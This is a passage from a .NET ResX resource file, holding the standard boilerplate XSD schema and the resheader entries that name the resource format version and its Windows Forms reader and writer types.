<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>